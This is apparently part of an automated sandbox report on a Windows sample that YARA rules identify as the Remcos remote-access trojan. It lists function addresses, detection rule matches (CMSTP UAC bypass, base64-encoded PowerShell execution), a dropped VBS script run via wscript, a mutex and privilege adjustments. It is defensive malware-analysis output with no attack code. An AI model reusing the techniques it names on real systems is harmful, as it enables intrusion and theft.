Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 5_2_0043A5AB 5_2_0043A5AB
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 5_2_00413631 5_2_00413631
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 5_2_00446690 5_2_00446690
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 5_2_0044A730 5_2_0044A730
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 5_2_004398D8 5_2_004398D8
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 5_2_004498E0 5_2_004498E0
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 5_2_0044A886 5_2_0044A886
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 5_2_0043DA09 5_2_0043DA09
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 5_2_00438D5E 5_2_00438D5E
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 5_2_00449ED0 5_2_00449ED0
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 5_2_0041FE83 5_2_0041FE83
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 5_2_00430F54 5_2_00430F54
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 6_2_004050C2 6_2_004050C2
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 6_2_004014AB 6_2_004014AB
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 6_2_00405133 6_2_00405133
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 6_2_004051A4 6_2_004051A4
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 6_2_00401246 6_2_00401246
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 6_2_0040CA46 6_2_0040CA46
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 6_2_00405235 6_2_00405235
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 6_2_004032C8 6_2_004032C8
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 6_2_004222D9 6_2_004222D9
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 6_2_00401689 6_2_00401689
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 6_2_00402F60 6_2_00402F60
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: String function: 00434E10 appears 54 times
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: String function: 004169A7 appears 87 times
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: String function: 004165FF appears 35 times
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: String function: 00422297 appears 42 times
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: String function: 00402093 appears 50 times
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: String function: 00434770 appears 42 times
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: String function: 0044DB70 appears 41 times
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: String function: 00401E65 appears 34 times
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: String function: 00444B5A appears 37 times
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: String function: 00413025 appears 79 times
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: String function: 00416760 appears 69 times
Sample file is different than original file name gathered from version info
Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000000.00000003.2169570412.000000000076F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemspass.exe8 vs 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe
Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000000.00000002.4555963712.000000000382B000.00000040.10000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenamemspass.exe8 vs 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe
Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000000.00000003.2198421779.0000000000801000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemspass.exe8 vs 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe
Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000000.00000003.2150758432.00000000007E2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewscript.exe.mui` vs 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe
Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000000.00000003.2150758432.00000000007E2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewscript.exe` vs 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe
Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000000.00000003.2170663657.0000000000801000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemspass.exe8 vs 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe
Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000000.00000003.2170134516.0000000000760000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemspass.exe8 vs 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe
Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Binary or memory string: OriginalFileName vs 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe
Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Binary or memory string: OriginalFilename vs 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe
Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000006.00000002.2174707883.000000000041B000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenamemspass.exe8 vs 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe
Uses 32bit PE files
Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, type: SAMPLE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, type: SAMPLE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, type: SAMPLE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: amsi32_2064.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: amsi32_5644.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: 0.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 4.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 4.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 4.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 5.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 5.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 5.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0.2.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 6.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 6.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 6.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000000.00000000.2093024228.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000005.00000000.2171694344.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000004.00000000.2170895717.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000006.00000000.2172358054.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe PID: 4368, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe PID: 3744, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe PID: 3792, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe PID: 3504, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 2064, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 5644, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine Classification label: mal100.rans.phis.troj.spyw.expl.evad.winEXE@18/13@4/4
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 4_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z, 4_2_004182CE
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_00417952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError, 0_2_00417952
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 6_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,FindCloseChangeNotification, 6_2_00410DE1
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 4_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,??3@YAXPAX@Z, 4_2_00418758
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_0040F474 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle, 0_2_0040F474
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_0041B4A8 FindResourceA,LoadResource,LockResource,SizeofResource, 0_2_0041B4A8
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, 0_2_0041AA4A
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\json[1].json Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Mutant created: \Sessions\1\BaseNamedObjects\shietgtst-A57Q98
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2248:120:WilError_03
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe File created: C:\Users\user\AppData\Local\Temp\Forfrelsens.vbs Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Forfrelsens.vbs"
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Command line argument: PG 0_2_0040E9C5
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Command line argument: PG 0_2_0040E9C5
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Command line argument: Software\ 0_2_0040E9C5
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Command line argument: Exe 0_2_0040E9C5
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Command line argument: Exe 0_2_0040E9C5
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Command line argument: Inj 0_2_0040E9C5
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Command line argument: Inj 0_2_0040E9C5
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Command line argument: PG 0_2_0040E9C5
